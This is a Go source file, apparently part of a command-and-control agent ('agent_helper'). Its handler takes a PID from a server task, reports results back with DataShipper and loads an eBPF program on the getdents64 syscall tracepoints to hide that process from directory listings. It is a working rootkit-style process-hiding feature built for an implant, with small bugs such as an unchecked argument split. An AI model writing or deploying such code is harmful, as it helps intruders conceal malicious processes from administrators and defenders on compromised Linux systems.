//go:build linux

package agent_helper

import (
	"bytes"
	"context"
	"encoding/binary"
	"fmt"
	"log"
	"os"
	"os/signal"
	"slices"
	"strconv"
	"strings"
	"syscall"

	"github.com/cilium/ebpf/link"
	"github.com/cilium/ebpf/ringbuf"
	"github.com/cilium/ebpf/rlimit"
)

const (
	prog01 = 1
	prog02 = 2

	maxPIDLen = 16
)

type event struct {
	Pid     int32
	Comm    [16]byte
	Success uint8
	_       [3]byte // C struct alignment
}

var (
	pidsHidden = []int{}
)

func PidHiderHandler(serverUrl string, taskData map[string]interface{}) {
	args := strings.TrimSpace(strings.ToLower(taskData["args"].(string)))

	argsSplit := strings.Split(args, " ")


	pid, err := strconv.Atoi(argsSplit[0])
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("invalid PID: %s", args))
		return
	}
	targetPPID, err := strconv.Atoi(argsSplit[1])
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("invalid PPID: %s", args))
	}



	if slices.Contains(pidsHidden, pid) {
		DataShipper(serverUrl, taskData, fmt.Sprintf("pid %s is already hidden", args))
		return
	}

	/*
		Older kernels may account BPF objects against RLIMIT_MEMLOCK.
	*/
	if err := rlimit.RemoveMemlock(); err != nil {
		log.Fatalf("remove memlock: %v", err)
	}

	/*
		Load the CollectionSpec generated by bpf2go.

		This does NOT load anything into the kernel yet.
	*/
	spec, err := loadBpf()
	if err != nil {
		log.Fatalf("load BPF spec: %v", err)
	}

	/*
		Equivalent to the following from pidhide.c:

		  skel->rodata->pid_to_hide
		  skel->rodata->pid_to_hide_len
		  skel->rodata->target_ppid
	*/

	pidString := strconv.Itoa(pid)

	if len(pidString)+1 > maxPIDLen {
		log.Fatal("PID string too large")
	}

	var pidBuffer [maxPIDLen]byte
	copy(pidBuffer[:], pidString)

	if err := spec.Variables["pid_to_hide"].Set(pidBuffer); err != nil {
		log.Fatalf("set pid_to_hide: %v", err)
	}

	if err := spec.Variables["pid_to_hide_len"].Set(
		int32(len(pidString) + 1),
	); err != nil {
		log.Fatalf("set pid_to_hide_len: %v", err)
	}

	if err := spec.Variables["target_ppid"].Set(
		int32(targetPPID),
	); err != nil {
		log.Fatalf("set target_ppid: %v", err)
	}

	/*
		Load maps/programs into the kernel.

		bpfObjects is generated by bpf2go.
	*/
	var objs bpfObjects

	if err := spec.LoadAndAssign(&objs, nil); err != nil {
		log.Fatalf("load BPF objects: %v", err)
	}
	defer objs.Close()

	/*
		Populate the program-array map.

		This corresponds to the two bpf_map_update_elem()
		calls in the original C loader.

		    slot 1 -> handle_getdents_exit
		    slot 2 -> handle_getdents_patch
	*/

	if err := objs.MapProgArray.Put(
		uint32(prog01),
		uint32(objs.HandleGetdentsExit.FD()),
	); err != nil {
		log.Fatalf("install tail call 1: %v", err)
	}

	if err := objs.MapProgArray.Put(
		uint32(prog02),
		uint32(objs.HandleGetdentsPatch.FD()),
	); err != nil {
		log.Fatalf("install tail call 2: %v", err)
	}

	/*
		Attach syscall ENTER.
	*/
	enterLink, err := link.Tracepoint(
		"syscalls",
		"sys_enter_getdents64",
		objs.HandleGetdentsEnter,
		nil,
	)
	if err != nil {
		log.Fatalf("attach enter tracepoint: %v", err)
	}
	defer enterLink.Close()

	/*
		Attach syscall EXIT.

		Notice that HandleGetdentsPatch is NOT attached.
		It is reached only via tail call.
	*/
	exitLink, err := link.Tracepoint(
		"syscalls",
		"sys_exit_getdents64",
		objs.HandleGetdentsExit,
		nil,
	)
	if err != nil {
		log.Fatalf("attach exit tracepoint: %v", err)
	}
	defer exitLink.Close()

	/*
		Ring-buffer reader.

		Equivalent to ring_buffer__new() +
		ring_buffer__poll() in the C version.
	*/
	reader, err := ringbuf.NewReader(objs.Rb)
	if err != nil {
		log.Fatalf("open ring buffer: %v", err)
	}
	defer reader.Close()

	ctx, cancel := signal.NotifyContext(
		context.Background(),
		os.Interrupt,
		syscall.SIGTERM,
	)
	defer cancel()

	go func() {
		<-ctx.Done()
		reader.Close()
	}()

	fmt.Printf("Loaded lesson 24 BPF program for PID %d\n", pid)

	for {
		record, err := reader.Read()
		if err != nil {
			if ctx.Err() != nil {
				break
			}

			log.Printf("ringbuf read: %v", err)
			continue
		}

		var e event

		if err := binary.Read(
			bytes.NewReader(record.RawSample),
			binary.LittleEndian,
			&e,
		); err != nil {
			log.Printf("decode event: %v", err)
			continue
		}

		comm := strings.TrimRight(
			string(e.Comm[:]),
			"\x00",
		)

		fmt.Printf(
			"pid=%d comm=%s success=%t\n",
			e.Pid,
			comm,
			e.Success != 0,
		)
	}
}
